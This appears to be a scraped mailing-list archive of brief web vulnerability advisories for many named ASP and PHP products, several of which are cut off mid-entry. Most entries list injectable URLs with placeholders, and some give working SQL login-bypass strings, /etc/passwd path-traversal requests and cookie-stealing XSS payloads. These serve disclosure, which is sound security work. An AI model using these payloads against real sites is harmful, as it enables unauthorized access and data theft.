php web portail [remote file include local file include]
download site: https://sourceforge.net/project/showfiles.php?group_id=178400
product:php web portail
bug: remote file include local file include
risk : high
local file include :
vendor site: http://fishcart.org/
product :fish cart
bug:injection sql
risk : medium
injection sql :
/display.php?cartid=200701210157208zid=1lid=1olimit=5cat=key1=nlst=yolst='[sql]
( change the cartid value with yours )
laurent gaffie
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
vendor site:http://phpbb.com/
product:phpbb
bug:xss
risk:low
A xss post has been discovered in phpbb ,the impact of this attack is very low
,because it's more a bug , than a vulnerability .
An authentificated user can excute some html code in his private message box ,
by sending a message to an
well actually there no injection sql in the var :
-page
-block
it's just an error for type mismatch ...
( Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: query_blabla]'
i think those guys ( aria ) doesn't understand the difference between an error
sql and a injection
[ Bug : SQL Injection Input string
By : Hackerz.ir
Link :
http://hide_your_url_plz.com ]
--
this is a simple error ...
( try with /default.aspx?page=Documentapp=Documents )
there's totally no injection in this case
vendor site: http://www.4u2ges.com/
product : Rapid Classified v3.1
bug: multiple xss (get) injection sql
risk : medium
injection sql :
/viewad.asp?id='[sql]
xss :
/reply.asp?id=[xss]
/view_print.asp?id=[xss]
/search.asp?categoryName=1SH1=[xss]
/reply.asp?id=5012081548011name=[xss]
vendor site:http://www.jiros.net/
product:JiRos Links Manager
bug: injection sql xss
risk : medium
injection sql:
/openlink.asp?LinkID='[sql]
/viewlinks.asp?CategoryID='[sql]
xss permanent (post):
in: /submitlink.asp
-Link Name:
-Link URL:
-Link Image:
-Link Description:
those xss are
vendor site: http://www.rockfordarea.com/
product : The Classified Ad System
bug: multiple xss (get) injection sql
risk : medium
injection sql (get):
/default.asp?action=viewmain='[sql]
injection sql (post) :
just post your query into the search engine
xss :
vendor site: http://www.creascripts.com/
product:creadirectory
bug: injection sql xss
risk : medium
injection sql:
/search.asp?search=1submit=Searchcategory='[sql]
xss:
/addlisting.asp?cat=[xss]
/search.asp?search=[xss]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL
vendor site:http://klf-design.com/
product :klf-realty
bug:injection sql
risk : medium
injection sql :
/search_listing.asp?category='[sql]
/detail.asp?property_id='[sql]
/search_listing.asp?agent='[sql]
laurent gaffie benjamin mosse
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
vendor site: http://softacid.net/
product:Link Exchange Lite
bug: injection sql
risk : high
injection sql (post) :
/search.asp
post your sql query into the search engine field
injection sql (get):
/linkslist.asp?psearch='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL
vendor site: http://www.grandora.com/
product : Rialto 1.6
bug:multiples injection sql , login bypass , xss
risk : high !
admin login bypass :
/admin/default.asp
username:' or '1' = '1
passwd: ' or '1' = '1
injection sql :
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
vendor site: http://www.vspin.net/
product :Classified System
bug:injection sql
risk : medium
injection sql :
/cat.asp?cat='[sql]
/search.asp?in=ykeyword='[sql]
/search.asp?in=ykeyword=1submit=Searchorder='[sql]
/search.asp?in=ykeyword=1submit=Searchorder=tbl_classads.col_idsort='[sql]
vendor site: http://enthrallweb.com/
product : eClassifieds
bug:injection sql
risk : medium
injection sql :
/ad.asp?AD_ID='[sql]
/ad.asp?cat_id='[sql]
/dircat.asp?cid='[sql]
/dirSub.asp?sid='[sql]
/ad.asp?cat_id=35sub_id='[sql]
/ad.asp?cat_id=35sub_id=102ad_id='[sql]
laurent gaffié benjamin
i've allready posted an advisory about that here:
http://www.securityfocus.com/archive/1/450268
regards laurent gaffié
http://s-a-p.ca/
vendor site: http://www.unverse.net/abitwhizzy/
product : aBitWhizzy
bug:local file include
global risk : high
http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
vendor site:http://vikingboard.com/
product:Vikingboard (0.1.2)
bug:local file include multiples permanent xss
risk:medium
error sql :
/members.php?s=-80
xss permanent :
- in private message , an attacker can send a pm to an administrator with some
javascript into the subject field an get
vendor site:http://www.2020autogallery.com/
product:20/20 auto gallery
bug:injection sql
global risk:high
injection sql get :
http://site.com/vehiclelistings.asp?vehicleID='[sql]
http://site.com/vehiclelistings.asp?categoryID_list='[sql]
http://site.com/vehiclelistings.asp?sale_type='[sql]
vendor site:http://www.2020applications.com/
product:20/20 real estate
bug:injection sql
risk:high
injection sql get :
/listings.asp?itemID='[sql]
/listings.asp?peopleID='[sql]
/f-google_earth.asp?itemID='[sql]
/f-email.asp?strPeopleID=1itemID='[sql]
vendor site:http://www.kervancilar.com/
product:Aspmforum
bug:injection sql (get post)
risk:high
injection sql get :
/forum.asp?baslik='[sql]
/forum2.asp?baslik=2soruid='[sql]
/kullanicilistesi.asp?ak=at=harf='[sql]
/kullanicilistesi.asp?at=baslayanak='[sql]
once logged :
vendor site:http://www.2020applications.com/
product:20/20 datashed
bug:injection sql
risk:high
injection sql get :
/f-email.asp?strPeopleID=1itemID='[sql]
/listings.asp?peopleID='[sql]
/listings.asp?sort_order='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL
product:Infinitytechs Restaurants CM
bug:injection sql
risk:medium
injection sql:
/rating.asp?id='[sql]
/meal_rest.asp?mealid='[sql]
/res_details.asp?resid='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
vendor site:http://www.sitesoutlet.com/
product:E-commerce Kit 1 PayPal Edition
bug:injection sql
risk:medium
injection sql :
http://site.com/PATH/catalogue.asp?keyword='[sql]
http://site.com/PATH/catalogue.asp?cid='[sql]
http://site.com/PATH//viewDetail.asp?pid='[sql]
laurent gaffié benjamin
vendor site:http://metalinks.com/
product:MetaCart e-Shop
bug:injection sql
risk:medium
injection sql (get) :
http://site.com/metacart/productsByCategory.asp?intCatalogID='[sql]
http://site.com/metacart/product.asp?intProdID='[sql]
injection sql(post) :
1
vendor site:http://phpmyadmin.net/
product:PhpMyAdmin all version
bug: xss permanent full path disclosure
global risk:high
xss post :
1) create a table , with whatever name , when it's done , go to operation
(/db_operations.php) and add a comment on your table with:
vendor site:http://www.enthrallweb.com/
product:eShopping Cart
bug:injection sql
risk:medium
injection sql :
http://site.com/reviews.asp?ProductID='[sql]
http://site.com/subProducts.asp?cat_id='[sql]
http://site.com/productdetail.asp?ProductID='[sql]
vendor site:http://www.candypress.com/
product:CandyPress Store
bug:injection sql
risk:medium
injection sql (get) :
http://site.com/sa3.5.2.14/scripts/openPolicy.asp?policy='[sql]
http://site.com/sa3.5.2.14/scripts/prodList.asp?brand='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
vendor site: http://www.aspcart.com
product: ASP Cart
bug: multiples injection sql post get
global risk: high !
injection get :
http://site.com/prodetails.asp?prodid='[sql]
injection (post) :
1)http://site.com/display.asp
Variables:
/display.asp?page='[sql]
2)http://site.com/addcart.asp
vendor site:http://www.pilotcart.com/
product:Pilot Cart V.7.2
bug:injection sql
risk:high
injection sql(post) :
in the search engine:
http://site.com/pilot.asp?pg=searchmode=results
variables :
srch='[sql]searchBy=Products
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL
vendor site:http://www.dotnetindex.com/
product:Active News Manager
bug:injection sql
risk:medium
injection sql (get)
http://site.com/activenews/activeNews_categories.asp?catID='[sql]
http://site.com/activeNews_comments.asp?articleID='[sql]
injection sql(post) :
in the search engine:
vendor site:http://www.dragoninternet.net/
product:Dragon Events Listing
bug:login bypass injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (get)
http://site.com/event_searchdetail.asp?ID='[sql]
http://site.com/venue_detail.asp?VenueID='[sql]
laurent
vendor site:http://www.expinion.net/
product:MultiCalendars
bug:injection sql
risk:medium
injection sql (get)
http://site.com/rss_out.asp?ID=1MODE=1M='[sql]
http://site.com/rss_out.asp?ID=1MODE=1M=10Y='[sql]
http://site.com/all_calendars.asp?month=11year=2006cate='[sql]
vendor site:http://www.futuretec-soft.com/
product:E-Calendar Pro 3.0
bug:login bypass injection sql post
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql post:
in : /search.asp
post your query into the search engine .
laurent gaffié benjamin mossé
vendor site:http://www.websitedesignsforless.com/
product:Inventory Manager
bug:injection sql xss (get)
risk:medium
injection sql :
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]picfield=[sql]
vendor site:http://www.lynxinternet.com/
product:Evolve Merchant
bug:injection sql
risk:medium
injection sql (get) :
http://site.com/viewcart.asp?zoneid='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
Car Site Manager [injection sql xss (get)]
vendor site:http://www.mginternet.com/
product:Car Site Manager
bug:injection sql
risk:medium
injection sql :
http://site.com/csm/asp/detail.asp?l=p='[sql]
http://site.com/csm/asp/listings.asp?l='[sql]
vendor site:http://www.funkyasp.co.uk/
product:FunkyASP Glossary v1.0
bug:injection sql
risk:medium
injection sql :
http://www.demo.funkyasp.co.uk/demo/glossary/glossary.asp?alpha='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
vendor site:http://www.drumster.net/
product:Blogme v3
bug:login bypass xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié benjamin mossé
http://s-a-p.ca/
vendor site:http://www.mginternet.com/
product:Property Site Manager
bug:injection sql ,login bypass , xss
risk:medium
login bypass :
just login with :
user: 'or''='
passwd: 'or''='
injection sql :
http://site.com/asp/detail.asp?l=p='[sql]
http://site.com/asp/listings.asp?l='[sql]
vendor site:http://www.webinhabit.com/
product:A+ Store E-Commerce
bug:injection sql xss post
risk:medium
injection sql (get) :
http://site.com/browse.asp?ParentID='[sql]
xss post :
in /account_login.asp:
username =
vendor site:http://www.alanward.net/
product:A-Cart pro
bug:injection sql
risk:medium
injection sql (get) :
/category.asp?catcode='[sql]
/product.asp?productid='[sql]
injection sql (post) :
http://site.com/search.asp
Variables:
/search.asp?search='[sql]
( or just post your query in the
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroupsearchstring='[sql]
( or just post your query in the search
vendor site: http://products.kaonsoftwares.com/
product: mega-mall
bug:injection sql full path disclosure
language: asp
risk: high
injection sql (get):
http://site.com/mega-mall/product_review.php?t=[sql]
http://site.com/mega-mall/product_review.php?t=0productId=[sql]
vendor site: http://www.ecommercemax.com/
product : infinicart
bug: multiples injection sql xss
language : asp
risk : high
injection sql (get):
/infinicart-demo/browse_group.asp?groupid=[sql]
/infinicart-demo/added_to_cart.asp?productid=[sql]
/infinicart-demo/browsesubcat.asp?catid=[sql]
vendor site:http://www.omnistararticle.com/
product :omnistar article manager
bug:injection sql
risk : high
path:
/articles/comments.php?article_id='[sql]
/articles/article.php?op=savearticle_id='[sql]
/articles/pages.php?page_id='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact:
vendor site: http://www.landshop.gr/
product: LandShop Real Estate
bug: multiple injection sql xss
risk : high
xss (get) :
http://site.com/PATH/action/ls.php?lang=enaction=liststart=/textarea'scriptalert(document.cookie)/script
software:Abarcar
product:Realty Portal
vendor site : http://www.abarcar.com/
risk : medium
/newsdetails.php?neid=[sql]
/slistl.php?slid=[sql]
/content.php?cat=[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
product:Portix-PHP
vendor site :http://portix2.be
risk : medium
log with :
username: 'or''='
passwd : 'or''='
xss post on the forum , vulnerable fields :
titre
auteur
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
FreeWebshop =2.2.2
severity: hight
vendor site: http://www.freewebshop.org/
impact: an anonymous user can access anyfile on the remote server
PoC :
http://site.com/?page=../../../../../../../../../../etc/passwd%00
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00
xss
product :Speedwiki 2.0
vendor site: http://speedywiki.sourceforge.net/
risk:critical
a user logged in , can upload a PHP script on the server , by the upload script
, there's actually no upload filter on this cms
path : /speedywiki/index.php?upload=1
xss get :
AIOCP =1.3.007 multiples vulnerabilities[injection sql , remote file include ,
xss]
XSS get =
-
/public/code/cp_forum_view.php?fmode=toptopid=/textarea'scriptalert(document.cookie)/script
-
/public/code/cp_forum_view.php?fmode=toptopid=53forid=/textarea'scriptalert(document.cookie)/script
-
there's also one injection sql in :
/default.asp?nav=38x47contid=-80
and an error sql here :
/default.asp?nav=38x47contid=606lid=-20
http://sap.ca/
vendor site: http://www.rhadrix.com/
risk : low
xss =
/index.php?rns=/titlescriptalert(document.cookie)/script
full path ( array )
/index.php?rns[]=
/index.php?pag[]=
benjamin mossé laurent gaffié
http://s-a-p.ca/
[[ SIMPLOG 0.9.3 ]]
cms website : http://www.simplog.org/
xss:
[*] Administration Panel
- user.php
*Name
*URL
*Email
*API Key
*Flickr Email
54 matches
Mail list logo
